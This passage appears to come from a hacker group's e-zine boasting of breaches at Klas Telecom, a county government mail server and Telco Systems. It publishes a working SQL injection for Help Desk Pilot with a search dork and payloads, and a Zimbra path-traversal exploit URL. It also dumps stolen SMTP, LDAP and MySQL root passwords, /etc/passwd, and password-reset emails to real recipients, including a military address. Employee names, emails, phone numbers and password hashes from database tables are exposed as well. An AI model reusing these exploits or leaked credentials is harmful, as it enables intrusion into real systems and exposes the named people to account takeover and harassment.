www.mobile.virginia.edu www.morphogenesis.virginia.edu www.mrsec.virginia.edu www.mydcav.org www.mylabpartner.org www.myuva.virginia.edu www.nationalsocialnorm.com www.nationalsocialnorm.org www.nationalsocialnorminstitute.com www.nationalsocialnorminstitute.org www.nationalsocialnorms.com www.nationalsocialnorms.org www.nationalsocialnormsinstitute.com www.nationalsocialnormsinstitute.org www.ntlcoalition.org www.ntls.info www.officearchitect.virginia.edu www.opengrounds.virginia.edu www.openportfolio.org www.organizationalexcellence.virginia.edu www.parallaxproject.org www.pharm.virginia.edu www.poetryforge.org www.primaryaccess.org www.publicaffairs.virginia.edu www.raisetherank.com www.rarebookschool.com www.rarebookschool.net www.rarebookschool.org www.rbsconnect.org www.readingfirst.virginia.edu www.readingquest.org www.readmeridian.org www.recsports.virginia.edu www.redirect-test.vfhblogs.org www.rff.vfhblogs.org www.riggoryridge.org www.rodmanscholars.org www.romereborn.virginia.edu www.rotunda.virginia.edu www.seas.virginia.edu www.sexualassault.virginia.edu www.sis.virginia.edu www.social.virginia.edu www.socialnorm.org www.socialnorminstitute.com www.socialnorminstitute.org www.socialnorms.org www.socialnormsinstitute.com www.socialnormsinstitute.org www.sophiarosenfeld.com www.southernmediafund.org www.staging.virginia.edu www.storyweb.org www.studiorecover.virginia.edu www.studyabroad.virginia.edu www.sysbio.virginia.edu www.teach.virginia.edu www.teacherlink.org www.tempo.virginia.edu www.test.vfhblogs.org www.trc.virginia.edu www.tti.virginia.edu www.upress.virginia.edu www.uva.edu www.uva2go.net www.uva2go.org www.uvacatering.com www.uvacse.virginia.edu www.uvaemergency.com www.uvaemergency.org www.uvafallschurch.com www.uvafamilies.virginia.edu www.uvarichmond.com www.uvaspeechandhearing.org www.uvatibetcenter.org www.uvatogo.net www.uvatogo.org www.vabc.vfhblogs.org www.vabook.org www.vaindianprogram.com www.vaindianprogram.net www.vaindianprogram.org www.vfh.vfhblogs.org www.vfhblogs.org www.vfhradio.org www.vfhumanities.org www.vignettes.vfhblogs.org www.virginia.edu www.virginiabookarts.org www.virginiabookarts.vfhblogs.org www.virginiafolklife.org www.virginiafoundation.org www.virginiahumanities.org www.virginiaindianprogram.com www.virginiaindianprogram.net www.virginiaindianprogram.org www.virginiavignettes.org www.viseyes.org www.wc.engl.virginia.edu www.wgr.vfhblogs.org www.whitehousetapes.org www.withgoodreasonradio.org www.womenscenter.virginia.edu www.xcg.virginia.edu www.ywlp-old.virginia.edu www.ywlp.virginia.edu wwwtest.virginia.edu xcg.virginia.edu youthviolence.edschool.virginia.edu ywlp-old.virginia.edu ywlp.edschool.virginia.edu ywlp.virginia.edu ywlp.womenscenter.virginia.edu ywlp.womenscenter.virginia.edu
  368.  
  369.           cat /tmp*:
  370. /tmp data:
  371.  
  372. *VC 5.0 *TM IBM,9115-505 *SE IBM,0306458FA *PI 000458FA *N5 911506-458FA 52A607-60092838298151351DB5510728700020041B5000200 00 0 555500000040AD 00000000 0000 *OS AIX 5.3.0.0 *FC ******** *DS System VPD *YL U9115.505.06458FA *RT VSYS *FG XXSV *BR P0 *SE 06458FA *TM 9115-505 *SU 0004AC1212AD *VK ipzSeries *FC ******** *DS CEC *YL U789F.001.AAA8848 *RT VCEN *FG XXEV *BR P0 *SE AAA8848 *TM 789F-001 *CI 9115-505 06458FA *RK 0000000000000000 *FC 789F-001 *VK ipzSeries *FC ******** *DS SYSTEM BACKPLANE *YL U789F.001.AAA8848-P1 *RT VINI *FG XXBP *CC 53B3 *SN YL10W8224009 *FN 10N6781 *PN 32N1339 *PR 2300000000000000 *HE 0001 *CT 40130202 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS ANCHOR *YL U789F.001.AAA8848-P1-C1 *RT VINI *FG XXAV *CC 52A6 *SN YL1076009283 *FN 03N5086 *PN 03N5086 *PR 8100180000000000 *HE 0010 *CT 40B40000 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *B9 43538298151351DB55105350CFE375BB77B8BBCF4D312B4729255050AECE4D32034B7CB9C95378384D33BC71D02ED0AEBB764D34E3E258C1A1CF2BEF *VK ipzSeries *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C4 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A1419 *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C6 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A152F *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C9 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A14AD *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C11 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A14AE *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS CEC OP PANEL *YL U789F.001.AAA8848-D1 *RT VINI *FG XXOP *CC 28A0 *SN YL10W819500T *FN 42R5377 *PN 10N9973 *HE 0001 *CT 40B50000 *HW 0001 *B3 000000000000 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS Voltage Reg *YL U789F.001.AAA8848-P1-C3 *RT VINI *FG XXRG *CC 6B16 *FN 24R2697 *VK RS6K *FC ******** *DS A IBM AC PS *YL U789F.001.AAA8848-E1 *RT VINI *FG XXPS *CC 51BC *SN YL10286B0076 *PN 39J5045 *FN 39J5045 *VK RS6K *FC ******** *DS A IBM AC PS *YL U789F.001.AAA8848-E2 *RT VINI *FG XXPS *CC 51BC *SN YL10286B0257 *PN 39J5045 *FN 39J5045 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A1 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A2 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A3 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A4 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS PCI BRIDGE *YL U789F.001.AAA8848-P1-C12 *RT VINI *FG XXIB *CC 271F *SN YL10W817803E *FN 03N6843 *PN 03N6843 *HE 0001 *CT 30F10005 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS PCI BRIDGE *YL U789F.001.AAA8848-P1-C13 *RT VINI *FG XXIB *CC 276F *SN YL10W8192046 *FN 03N6846 *PN 03N6846 *HE 0001 *CT 30F10005 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS System Firmware *YL U9115.505.06458FA-Y1 *CL Phyp_1 15532009040980A00701 *CL PFW 17152009030681CF0681 *CL FSP_Ker 16582009042181E00100 *CL FSP_Fil 16582009042181E00101 *CL FipS_BU 16582009042181E00200 *CL SMA 11392005070781E00500 *CL SPCN3 124620060531A0E00A11 *CL SPCN1 091620040823A0E00D00 *CL SPCN2 125920060628A0E00D20 *MI SF240_382 SF240_358 SF240_382 *FC ======== *DS IDE DVD-ROM Drive *AX cd0 *PL 05-08-00 *MF IBM *TM DROM0020561 *RL DA31 *Z0 058002028F000010 *YL U789F.001.AAA8848-P1-D3 *FC ======== *DS 16 Bit LVD SCSI Disk Drive *AX hdisk0 *PL 06-08-01-5,0 *MF IBM H0 *TM ST373455LC *FN 03N6347 *RL 43383038 *SN 0004ED3D *EC D76038 *PN 03N6346 *Z0 000004129F000136 *Z1 0913C808 *Z2 0002 *Z3 07301 *Z4 0001 *Z5 22 *Z6 D76038 *BR H0 *YL U789F.001.AAA8848-P1-T9-L5-L0 *FC ======== *DS 16 Bit LVD SCSI Disk Drive *AX hdisk1 *PL 06-08-01-8,0 *MF IBM H0 *TM ST373455LC *FN 03N6347 *RL 43383038 *SN 0004ED39 *EC D76038 *PN 03N6346 *Z0 000004129F000136 *Z1 0913C808 *Z2 0002 *Z3 07301 *Z4 0001 *Z5 22 *Z6 D76038 *BR H0 *YL U789F.001.AAA8848-P1-T9-L8-L0 *FC ======== *DS SCSI Enclosure Services Device *AX ses0 *PL 06-08-01-15,0 *MF IBM *TM VSBPD2E1 U4SCSI *RL 6781 *SN W8224009 *Z0 0D0002022F004000 *FN 10N6781 *FL P1 *FS 789F-001 AAA8848 *YL U789F.001.AAA8848-P1-T9-L15-L0 *YL U789F.001.AAA8848-P1-T9-L15-L0
  373.  
  374.  
  375.     █   █ █  █ █    ███   █████
  376.    ███    █ █  █   █   █ █
  377.   ██ █    ██   █   █████ █  
  378.  ██  █    █ █  █   █   █  ████
  379. ███████   █  █ ███ █   █      █
  380.     ██                        █
  381.     ██  █                █████
  382.  
  383.  
  384.  
  385.      Klass Telecom, I know the majority of you have not heard of this Telecommunications company.. however; the reason in which we hacked them is here:
  386.  
  387.     On their website:
  388.  
  389.         Engineering is the heart of Klas Telecom.
  390.         With over 80% of the company’s employment dedicated to engineering, design, research and development, Klas Telecom is able to stay on the forefront of the tactical communications solutions market.
  391.         Our expert engineers work ceaselessly to solve the unique challenges of communicating securely in military and other austere environments.
  392.         They ensure that our products take advantage of emerging technology while having their base in industry standards.
  393.         Founded in 1991, Klas Telecom has been developing connectivity equipment for U.S. and international federal governments for over 22 years.
  394.  
  395.     On their twitter:
  396.  
  397.      Klas Telecom, founded in 1991, has been providing integrated, secure tactical communications solutions to the Department of Defense for over 12 years.
  398.  
  399.    As it says, they have been developing communication means for the U.S. And International Govt..
  400.   Whelp, #FuckTheSystem.
  401.  
  402.     Klas Telecom had a legacy helpdesk set-up that was suppose to be limited through the .htaccess to their own ip range.
  403.    They didn't rewrite certain things as variables in the .htaccess file; allowing everyone to view this server outside the range on the move.
  404.    Well, we had a little Error based SQL injection 0day on helpdesk pilot just sitting around; one day, we decided to do a skim through the dork.
  405.  
  406.     One of the first things to pop up was a website called grrip.net; so, we examined it, and exploited it propperly.
  407.    P.S: Here's the 0day, don't really need it anymore; so releasing it to the public, it's how we accessed their email.
  408.  
  409.           # Exploit Title: Help Desk Pilot 4.4.5 Error-based SQL Injection
  410.           # Google Dork: "knowledgebase.php?act=artattach&att_id"
  411.           # Date: 3/15/2013
  412.           # Exploit Author: NullCrew
  413.           # Vendor Homepage: http://www.twitter.com/NullCrew_FTS
  414.           # Software Link: http://www.helpdeskpilot.com/
  415.           # Version: Help Desk Pilot 4.4.5
  416.           # Tested on: Windows, Linux
  417.  
  418.           An error based SQL Injection vulnerability lies in the knowledgebase's $_GET['att_id'] of $_GET['artattach'].
  419.           The syntax of the vulnerability is as basic as it gets.
  420.  
  421.           The database contains mail information in the "config" table, so you might want to check that out.
  422.  
  423.           EXAMPLE: 127.0.0.1/knowledgebase.php?act=artattach&att_id=31337'
  424.           EXAMPLE: 127.0.0.1/knowledgebase.php?act=artattach&att_id=31337 or 1 group by concat(version(),floor(rand()*2)) having min(NULL) or 1--
  425.  
  426.           Any questions can be sent to: twitter.com/NullCrew_FTS
  427.           -------------------------------------------------------
  428.  
  429.          Now, onto Klas's email:
  430.  
  431.                    ---Email-------------------------------
  432.                    SMTP Port: 465
  433.                    SMTP Host: smtp.gmail.com
  434.                    SMTP Username: helpdesk@klasonline.com
  435.                    SMTP Password: Ax4JD%4Ks
  436.                    ---End Email---------------------------
  437.  
  438.          Alright, so, our next step was decrypting the passwords; Whelp, this was taking to long.
  439.         Considering we had access to the support desks smtp services..
  440.         We were able to easily just go to request a new password, and boom; we had access.
  441.  
  442.         (Proof.)
  443.  
  444.         Return-Path: <helpdesk@klasonline.com>
  445.         Received: from grrip.net ([67.192.46.6])
  446.         by mx.google.com with ESMTPSA id fj1sm4935014oeb.5.2014.04.02.00.01.11
  447.         for <frank_murray@eircom.net>
  448.         (version=TLSv1 cipher=RC4-SHA bits=128/128);
  449.         Wed, 02 Apr 2014 00:01:12 -0700 (PDT)
  450.         Date: Wed, 2 Apr 2014 02:01:11 -0500
  451.         Return-Path: helpdesk@klasonline.com
  452.         To: frank_murray@eircom.net
  453.         From: helpdesk@klasonline.com
  454.         Reply-To: helpdesk@klasonline.com
  455.         Subject: Your password: Login information
  456.         Message-ID: <bc15042d8360f4a153b9274e76df627e@grrip.net>
  457.         X-Priority: 3
  458.         X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version 2.0.2]
  459.         MIME-Version: 1.0
  460.         Content-Transfer-Encoding: 8bit
  461.         Content-Type: text/html; charset="ISO-8859-1"
  462.  
  463.         Dear Frank (No name for you.)
  464.  
  465.         We received a request to reset and send your password to your email.
  466.  
  467.         Your password is ZTYXJDUT .
  468.  
  469.         Use your email address and password to login to help desk interface: http://www.grrip.netindex.php .
  470.  
  471.         Regards,
  472.         Admin
  473.  
  474.       (Another, for proof; Military email.)
  475.  
  476.         Return-Path: <helpdesk@klasonline.com>
  477.         Received: from grrip.net ([67.192.46.6])
  478.         by mx.google.com with ESMTPSA id wy2sm2014265obc.21.2014.04.02.00.13.24
  479.         for <joshua.skidmore@afghan.swa.army.mil>
  480.         (version=TLSv1 cipher=RC4-SHA bits=128/128);
  481.         Wed, 02 Apr 2014 00:13:24 -0700 (PDT)
  482.         Date: Wed, 2 Apr 2014 02:13:24 -0500
  483.         Return-Path: helpdesk@klasonline.com
  484.         To: joshua.skidmore@afghan.swa.army.mil
  485.         From: helpdesk@klasonline.com
  486.         Reply-To: helpdesk@klasonline.com
  487.         Subject: Your password: Login information
  488.         Message-ID: <8d57477fbbe85032a3422537a68f220f@grrip.net>
  489.         X-Priority: 3
  490.         X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version 2.0.2]
  491.         MIME-Version: 1.0
  492.         Content-Transfer-Encoding: 8bit
  493.         Content-Type: text/html; charset="ISO-8859-1"
  494.  
  495.         Dear (No more info for you.)
  496.         We received a request to reset and send your password to your email.
  497.  
  498.         Your password is VAFYVPIH .
  499.  
  500.         Use your email address and password to login to help desk interface: http://www.grrip.netindex.php .
  501.  
  502.         Regards,
  503.         Admin
  504.  
  505.      On a side note, Klas Telecom played things smart; Their IT @cros13 was contacted after our tweet.
  506.     They observed the servers and noticed that we have indeed achieved access; We had a conversation with this IT.
  507.     He is the most sensibile IT that we have come across, with that we'd like to give a special shout-out to the fella, good-job, mate.
  508.  
  509.  
  510.  █████  █              
  511. █         ███ ██     █ ████   ███  ████  ██     █  ████
  512. ██████     █  █ █    █ █   █   █  █    █ █ █    █ █    █
  513.       █    █  █  █   █ █    █  █  █    █ █  █   █ █    █
  514. █     █    █  █   █  █ █    █  █  ██████ █   █  █ ██████
  515.  █████     █  █    █ █ █   █   █  █    █ █    █ █ █    █
  516.           ███ █     ██ ████   ███ █    █ █     ██ █    █
  517.  
  518.         █
  519.  
  520.    mail.tiptoncounty.In.gov - Alright, much like Comcast, and Al Arabiya; (With the exception of less servers.)
  521.   Coming to the realization that it was running on Zimbra, and that even Comcast didn't patch..
  522.   We decided to attempt to pull the usual LDAP and MySQL information from localconfig.xml.. It worked.
  523.  
  524.   Exploit URL (Nab it while it's hot.): http://mail.tiptoncounty.in.gov/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
  525.  
  526.      ldap port:
  527.      a["<key"]="name=\"ldap_port\">";
  528.      a["<value>389</value>"]="";
  529.  
  530.      Zimbra User:
  531.      a["<key"]="name=\"zimbra_user\">";
  532.      a["<value>zimbra</value>"]="";
  533.  
  534.      Zimbra ldap:
  535.      a["<key"]="name=\"zimbra_ldap_password\">";
  536.      a["<value>uL3xmqJwm</value>"]=""
  537.  
  538.      Amavis:
  539.      a["<key"]="name=\"ldap_amavis_password\">";
  540.      a["<value>uL3xmqJwm</value>"]="";
  541.  
  542.      Truststore:
  543.      a["<key"]="name=\"mailboxd_truststore_password\">";
  544.      a["<value>changeit</value>"]="";
  545.  
  546.      Keystore:
  547.      a["<key"]="name=\"mailboxd_keystore_password\">";
  548.      a["<value>cy2jaP5jT</value>"]="";
  549.  
  550.      Zimbra MySQL:
  551.      a["<key"]="name=\"zimbra_mysql_password\">";
  552.      a["<value>NgrfUQjZH4oTpW4rF7QR6N7jHwM0QGbH</value>"]="";
  553.  
  554.      MySQL root password:
  555.      a["<key"]="name=\"mysql_root_password\">";
  556.      a["<value>NKrQYWwmI8mcUKdrG0NSr7gqrQBlnun</value>"]="";
  557.  
  558.      ldap postfix:
  559.      a["<key"]="name=\"ldap_postfix_password\">";
  560.      a["<value>uL3xmqJwm</value>"]="";
  561.  
  562.      ldap replication:
  563.      a["<key"]="name=\"ldap_replication_password\">";
  564.      a["<value>uL3xmqJwm</value>"]="";
  565.  
  566.      ldap ngix:
  567.      a["<key"]="name=\"ldap_nginx_password\">";
  568.      a["<value>uL3xmqJwm</value>"]="";
  569.  
  570.      ldap root password:
  571.      a["<key"]="name=\"ldap_root_password\">";
  572.      a["<value>uL3xmqJwm</value>"]="";
  573.  
  574.      etc/passwd/:
  575.  
  576.      a.root="x:0:0:root:/root:/bin/bash";
  577.      a.daemon="x:1:1:daemon:/usr/sbin:/bin/sh";
  578.      a.bin="x:2:2:bin:/bin:/bin/sh";
  579.      a.sys="x:3:3:sys:/dev:/bin/sh";
  580.      a.sync="x:4:65534:sync:/bin:/bin/sync";
  581.      a.games="x:5:60:games:/usr/games:/bin/sh";
  582.      a.man="x:6:12:man:/var/cache/man:/bin/sh";
  583.      a.lp="x:7:7:lp:/var/spool/lpd:/bin/sh";
  584.      a.mail="x:8:8:mail:/var/mail:/bin/sh";
  585.      a.news="x:9:9:news:/var/spool/news:/bin/sh";
  586.      a.proxy="x:13:13:proxy:/bin:/bin/sh";
  587.      a["www-data"]="x:33:33:www-data:/var/www:/bin/sh";
  588.      a.backup="x:34:34:backup:/var/backups:/bin/sh";
  589.      a.list="x:38:38:Mailing List Manager:/var/list:/bin/sh";
  590.      a.irc="x:39:39:ircd:/var/run/ircd:/bin/sh";
  591.      a.gnats="x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh";
  592.      a.nobody="x:65534:65534:nobody:/nonexistent:/bin/sh";
  593.      a.libuuid="x:100:101::/var/lib/libuuid:/bin/sh";
  594.      a.dhcp="x:101:102::/nonexistent:/bin/false";
  595.      a.syslog="x:102:103::/home/syslog:/bin/false";
  596.      a.klog="x:103:104::/home/klog:/bin/false";
  597.      a.bind="x:104:111::/var/cache/bind:/bin/false";
  598.      a.sshd="x:105:65534::/var/run/sshd:/usr/sbin/nologin";
  599.      a.dave="x:1000:1000:Dave,,,:/home/dave:/bin/bash";
  600.      a.zimbra="x:1001:1001::/opt/zimbra:/bin/bash";
  601.      a.postfix="x:1002:1002::/opt/zimbra/postfix:/bin/sh";
  602.      a.clamav="x:106:115::/var/lib/clamav:/bin/false";
  603.  
  604.  
  605.   █████   █    ███████  ██████  █       ███████    ███████
  606.  ██    █          █     █       █       █         █       █
  607.  █                █     █       █       █        █         █
  608.  █ ████           █     █████   █       █        █         █ & BATM
  609.  ██   ██          █     █       █       █        █         █
  610.  █     ██         █     █       █       █         █       █
  611.  ██     █         █     ██████  ██████  ███████    ███████
  612.   ██   █
  613.    ████   █
  614.                
  615.        Founded in 1972 and based in Mansfield, Massachusetts, Telco Systems designs, develops and markets edge telecom network solutions which enable service providers to create an intelligent end-to-end Carrier Ethernet/MPLS network.
  616.      Telco Systems solutions focused around four primary vertical markets - carrier cloud networking and cloud services, business Ethernet services, mobile backhaul [1] and AdvancedTCA (ATCA) switching blades.
  617.  
  618.       Sorry guise, but, as this e-zine is obviously proving? You all fucking suck, heavily; At most things.
  619.      Especially securing your system, which as a company providing these types of things? It should be secured, and constantly patched.
  620.      But, nooooooo, go figure; you guise suck, and this is what happens when the aliens of NC drop by to pay ya a visit!
  621.  
  622.       Let's see here, it couldn't be that all your backups are belong to us, or anything, right?
  623.        When you download the contents below at the end of the zine; you will be downloading three sql dbs from telco as well.
  624.  
  625.       Proof before download:
  626.  
  627. INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
  628.         ('1', 'admin', '$P$BLkCcV81SBWzPRWAeH7HPrR363nJEt.', 'admin', 'mzabaruk@telco.com', 'http://www.telco.com', '2012-02-13 17:04:28', '', '0', 'Masha Zabaruk')
  629.         ,('3', 'Nir Halachmi', '$P$Blg3v43rX0BhNeOdi2P7CwppiEa6ay0', 'nir-halachmi', 'marketing@telco.com', '', '2012-02-13 17:10:29', '', '0', 'Nir Halachmi')
  630.         ,('4', 'Irit Gillath', '$P$BbXlrDdc7dWRW.1IJ9FnaF1HCsvRm50', 'irit-gillath', 'igillath@telco.com', '', '2012-02-13 17:10:29', '', '0', 'Irit Gillath')
  631.         ,('5', 'Aviv Miller', '$P$BdtfN80AaBQe/dC7NE6LdTzplypyh./', 'aviv-miller', 'amiller@telco.com', '', '2012-02-13 17:10:29', '', '0', 'Aviv Miller')
  632.         ,('12', 'ggum', '$P$B8sAOSjrXs0GzZsJuquhsh.XUd2qEJ1', 'ggum', 'ggum@gum.com', '', '2013-01-30 04:26:20', '', '0', 'Greg Gum')
  633.         ,('7', 'motin', '$P$Bw3zlfRilcDRFNtQL80OJOGPRBQY5f.', 'motin', 'motin@telco.com', 'http://www.telco.com', '2013-01-25 18:02:35', '', '0', 'Moti Nisim')
  634.         ,('14', 'moshe-shimon', '$P$BnoP504/znW8JF37wnMU6OZdE1Lbam.', 'moshe-shimon', 'moshes@telco.com', 'http://www.telco.com', '2013-01-30 18:00:42', '', '0', 'Moshe Shimon')
  635.         ,('15', 'taylor-salman', '$P$B.Rp3ZEMeiVk5QIlSPXc3KCMvD2dF6/', 'taylor-salman', 'tsalman@telco.com', 'http://www.telco.com', '2013-01-30 18:02:12', '', '0', 'Taylor Salman');
  636.  
  637.  
  638. INSERT INTO `operators` (`opID`, `refwhen`, `opName`, `opUsername`, `opPassword`, `opIP`, `opCompany`, `opDesc`, `opPhone`, `opEmail`, `opRole`, `opAutologout`, `active`) VALUES
  639.         ('1', '0000-00-00 00:00:00', 'Nikolay Hristov', 'blake', '962da309e5db8119b6bda644ec7b1aa0043435b8', '', 'Alienlab', 'Web Developer', '+359 888 893824', 'blake@codium.biz', '1', '0', '1')
  640.         ,('2', '2012-01-13 09:05:55', 'Masha Zabaruk', 'masha', '582a2631523e07b219826a048be997ca2c6773c7', '', 'Telco Systems USA', '', '', 'mzabaruk@telco.com', '1', '0', '1')
  641.         ,('3', '2012-10-23 12:54:49', 'Vicki Kobza', 'vicki', '923040f705b4ddfbbaee2ca2024409b4fdf1cf76', '', 'Telco Systems', '', '', '', '1', '0', '0');
  642.  
  643. INSERT INTO `operators` (`opID`, `opSupportAdmin`, `refwhen`, `opName`, `opUsername`, `opPassword`, `opIP`, `opCompany`, `opDesc`, `opPhone`, `opEmail`, `opRole`, `opZones`, `opAutologout`, `creator`, `active`) VALUES
  644.         ('1', '0', '0000-00-00 00:00:00', 'Nikolay Hristov', 'blake', '962da309e5db8119b6bda644ec7b1aa0043435b8', '', 'Alienlab', 'Web Developer', '+359 888 893824', 'blake@telco.com', '1', '', '0', '1', '1')
  645.         ,('2', '0', '2012-01-13 09:05:55', 'Masha Zabaruk', 'masha', '75e000964285acd468ed63c2bf09f10c0e1d6bab', '', 'Telco Systems USA', '', '', 'mzabaruk@telco.com', '1', '', '0', '1', '1')
  646.         ,('10', '0', '2012-11-28 09:40:21', 'Tester Tester', 'tester', '399e34b6bd6610702d655a5e8654e7b207dbd1ef', '', '', '', '', '', '1', '', '0', '1', '1')
  647.         ,('4', '1', '2012-05-14 11:16:32', 'Momchil Boychev', 'momchil', '3025b2294d44426f4c3b7721103c613352148d4f', '', 'Telco Systems BG', '', '', 'momchil@telco.com', '2', '1345678', '0', '1', '1')
  648.         ,('5', '0', '2012-08-09 01:42:55', 'Irit Gillath', 'irit', '864d7f6d52e1b7084ccdfe7504aa280510ea8a75', '', '', '', '', '', '2', '', '0', '1', '1')
  649.         ,('6', '1', '2012-08-27 09:08:03', 'Yoni Nabedrick', 'Yoni', '88a638243d2b7241c9115e2ae6bb5fd250ae8037', '', 'Telco Systems IL', 'PS Engineer', '', '', '2', '14', '0', '3', '1')
  650.         ,('7', '1', '2012-09-03 07:04:36', 'Yossi Gilany', 'ygilany', '2c47e236d897ff313dd6d8024ae18b3405ff1167', '', 'Telco Systems IL', 'PS Director', '', 'ygilany@batm.co.il', '2', '1345678', '0', '3', '1')
  651.         ,('8', '1', '2012-09-03 07:08:02', 'Zwi Walerstein', 'ZwiW', '7be4402c10847923e7998b4b5c5cd29747b4a695', '', 'Telco Systems IL', 'GM', '', '', '2', '134', '0', '7', '0')
  652.         ,('9', '1', '2012-09-19 10:18:53', 'Telco marketing', 'telco', 'c0533c6c1e9e60e75b2de0719c075a51d83a7b54', '', '', '', '', '', '2', '123', '0', '1', '1')
  653.         ,('13', '1', '2012-12-18 10:35:59', 'Telco PLM Test admin', 'plm', 'fde1150d18147d27c90148ed6bff32d7faf4c318', '', 'Telco Systems', '', '', '', '2', '1345678', '0', '1', '1')
  654.         ,('14', '1', '2013-01-07 15:06:15', 'Smita Pande', 'spande', '632f92623a3c512d7ef7a01698dca536f85b39ff', '', 'Telco Systems', 'Professional Services Engineer', '', 'spande@telco.com', '2', '12345678', '0', '2', '1')
  655.         ,('15', '1', '2013-01-07 15:18:46', 'Deyan Dichev', 'ddichev', 'f89a3539c1466c3154719b765b3ca051cb638633', '', '', 'PS Engineer', '+1 781 255 2550', 'ddichev@telco.com', '2', '12345678', '0', '2', '1')
  656.         ,('16', '1', '2013-01-07 15:46:18', 'Jeffrey Richard', 'jrichard', 'ea2a827dd822a188bf2cbc8fa4eef14ec595d870', '', 'Telco Legacy Division', 'Technical Support Engineer\r\nTelco Legacy Division', '781-255-2495', 'jrichard@telco.com', '2', '12345678', '0', '2', '1')
  657.         ,('19', '0', '2013-01-08 04:13:06', 'Daniela Dankova', 'dani', 'c1de93ce16028a61f4e71c3430e911f82c23e0ca', '', 'Telco Systems BG', 'Tech Writer', '', 'daniela@telco.com', '1', '', '0', '1', '1')
  658.         ,('25', '1', '2013-01-17 09:27:34', 'INSIDE SALES', 'inside_sale', '936215472726262a68bb1652b3b794b23763b63f', '', 'TELCO SYSTEMS', 'This is for Gale & Erin for Inside Sales', '', 'sales@telco.com', '3', '12', '0', '14', '1')
  659.         ,('18', '1', '2013-01-07 16:43:50', 'Dave Lee', 'dlee', '35462c4fc4f343a1c2cfb13b6a08132cb6aae231', '', 'Telco Legacy Division', 'V.P. Business Development', '', 'dlee@telco.com', '2', '12345678', '0', '2', '1')
  660.         ,('20', '1', '2013-01-08 04:23:04', 'Nadine Dove', 'nadine', '9e6939b5e640b29edf543064fef1fff40062a11c', '', 'Telco Systems IL', '', '', 'nadine.d@telco.com', '2', '1', '0', '1', '1')
  661.         ,('21', '1', '2013-01-08 04:25:11', 'Moshe Haimov', 'haimov', 'f7d8131aba4ddccb62722702762f0d11eafd3b31', '', 'Telco Systems IL', '', '', 'mosheh@telco.com', '2', '1', '0', '1', '1')
  662.         ,('32', '1', '2013-02-01 08:46:13', 'Gast?n Cutignola', 'gcutignola', '', '', 'Telco Systems', 'SE, Latin America\r\n\r\nPassword - access4telco', '', 'gcutignola@telco.com', '3', '12345678', '0', '15', '1')
  663.         ,('24', '1', '2013-01-11 10:24:56', 'Blake Test', 'blaketest', '6e5e5df8d1574e60a976d8e5551879eaa35dd1a2', '', '', '', '', '', '2', '1345678', '0', '19', '1')
  664.         ,('23', '1', '2013-01-10 12:14:53', 'Paul Schilling', 'pschilling', '366feae8e049672053e0428ae85506243068b148', '', 'Telco Legacy Division', 'Technical Support Engineer\r\nTelco Legacy Division', '781-255-5214', 'pschilling@telco.com', '2', '12', '0', '17', '1')
  665.         ,('26', '1', '2013-01-24 06:51:05', 'Markus Pestinger', 'markus', 'cd01a82a5a2fa78f71bdb1b454a403fcf14f8244', '', 'Telco Systems', 'SE EMEA', '', '', '3', '12345678', '0', '19', '1')
  666.         ,('27', '1', '2013-01-24 06:53:20', 'Derek Wang', 'derek', '41284decb53556cf2919383e0b073ce0fcace300', '', 'Telco Systems', 'SE APAC', '', '', '3', '12345678', '0', '19', '1')
  667.         ,('28', '1', '2013-01-24 06:55:57', 'Daniel Bravarnik', 'daniel', 'daaaa0e7471062a330ceb2ec876c418807fd927c', '', 'Telco Systems', 'SE North America', '', '', '3', '12345678', '0', '19', '1')
  668.         ,('33', '1', '2013-02-04 15:20:23', 'Bob St. Hilaire', 'bobsthilaire', 'bdd761f29af1f28fc9b2c487f1d7df0d5b345f82', '', 'Telco Systems', 'Operations.', '781-255-2291', 'bsthilaire@telco.com', '3', '12', '0', '15', '1')
  669.         ,('30', '1', '2013-01-24 07:01:55', 'Pasquale Tagliarini', 'pasquale', '5769965bd169aac9c3da65d5630278785460880f', '', 'Telco Systems', 'SE North America', '', '', '3', '12345678', '0', '19', '1')
  670.         ,('31', '1', '2013-01-24 07:02:53', 'Salah Chaou', 'salah', 'e35a40146c853b582f5ba1849d5183602fa3c58f', '', 'Telco Systems', 'SE North America', '', '', '3', '12345678', '0', '19', '1')
